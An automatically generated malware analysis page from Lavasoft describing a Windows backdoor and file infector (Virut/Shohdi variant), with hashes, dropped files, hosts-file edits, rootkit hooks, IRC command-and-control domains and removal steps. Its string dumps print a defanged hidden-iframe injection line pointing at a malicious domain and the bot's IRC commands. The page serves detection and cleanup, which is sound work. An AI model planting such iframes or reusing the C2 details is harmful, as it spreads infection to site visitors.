Gen.Variant.Midie.35218_addec6da6f

by malwarelabrobot on September 20th, 2017 in Malware Descriptions.

Gen:Variant.Midie.35218 (BitDefender), Virus:Win32/Shodi.I (Microsoft), Virus.Win32.Virut.ce (Kaspersky), Win32.HLLP.Shohdi (DrWeb), Gen:Variant.Midie.35218 (B) (Emsisoft), Artemis!ADDEC6DA6F94 (McAfee), ML.Attribute.HighConfidence (Symantec), Backdoor.Win32.Hupigon (Ikarus), Gen:Variant.Midie.35218 (FSecure), Win32:Vitro (AVG), Win32:Vitro (Avast), TROJ_OBFUSCATOR_GC140262.UVPM (TrendMicro), Gen:Variant.Midie.35218 (AdAware), VirusVirut.YR (Lavasoft MAS)
Behaviour: Backdoor, Virus


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: addec6da6f94dae9f0bf25c61cdaad3a
SHA1: c2b7e15bbc7be90ef5a52fbd613d116263fd7e56
SHA256: 30405b0d3e4c9384727f6ff3aefa2256195c4adee3f64fdaa7f693a01cef682d
SSDeep: 3072:jkpQSccsWlXCFLcVygI7JVLJ3Jh9ypXDCXfUfCwhnVo2bLeZ:jkprDC3FppJipg4k
Size: 170903 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: DefenderPro Inc.
Created at: 2004-09-12 12:55:29
Analyzed on: Windows7 SP1 32-bit


Summary:

Backdoor. Malware that enables a remote control of victim's machine.

Payload

No specific payload has been found.

Process activity

The Backdoor creates the following process(es):

ntvdm.exe:1796

The Backdoor injects its code into the following process(es):

%original file name%.exe:1908

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1908 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
C:\addec6da6f94dae9f0bf25c61cdaad3a.usr (59861 bytes)
C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)

The Backdoor deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.usr (0 bytes)
C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.usr (0 bytes)

The process ntvdm.exe:1796 makes changes in the file system.
The Backdoor creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7C8F.tmp (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7C7F.tmp (335 bytes)

The Backdoor deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7C8F.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7C7F.tmp (0 bytes)

Registry activity

Dropped PE files

MD5 File path
2838e1b050f5773545427b231785cdc2 c:\addec6da6f94dae9f0bf25c61cdaad3a.usr

HOSTS file anomalies

The Backdoor modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 jL.chura.pl
127.0.0.1 validation.sls.microsoft.com


Rootkit activity

The Backdoor installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
4096 16384 6656 5.29846 4cee79ac2671e36829d0bb610df5b052
.rsrc 20480 102400 102400 3.08358 501fac2bd5b57012b4995184f3152aeb
petite 122880 379 512 2.83683 d9152af36e3787ad41768ba5d11906da

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
ba2a35409ea953a9c3634a25af7c50e5
acb25cc073acadfa8ff558dde1ca3669

URLs

URL IP
sys.zief.pl 148.81.111.121
teredo.ipv6.microsoft.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Reply Sinkhole - irc-sinkhole.cert.pl

Traffic

The Backdoor connects to the servers at the folowing location(s):

%original file name%.exe_1908:

`.rsrc
D$(PSSh
ccRegVfy.exe
ccApp.exe
IEXPLORE.EXE
windows
\*.exe
.text
.data
.rsrc
msvcrt.dll
KERNEL32.dll
nddeapir.pdb
_acmdln
m.Zw%
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>
KERNEL32.DLL
windowsupdate
drweb
user32.dll
kernel32.dll
MSVCIRT.dll
MSVCRT.dll
5.1.2600.0 (xpclient.010817-1148)
NDDEAPIR.EXE
Windows
Operating System
5.1.2600.0

%original file name%.exe_1908_rwx_00401000_00002000:

D$(PSSh

%original file name%.exe_1908_rwx_00419000_00005000:

ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>
KERNEL32.DLL
windowsupdate
drweb


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ntvdm.exe:1796

  3. Delete the original Backdoor file.
  4. Delete or disinfect the following files created/modified by the Backdoor:

    C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (21682 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
    C:\addec6da6f94dae9f0bf25c61cdaad3a.usr (59861 bytes)
    C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7C8F.tmp (269 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scs7C7F.tmp (335 bytes)

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now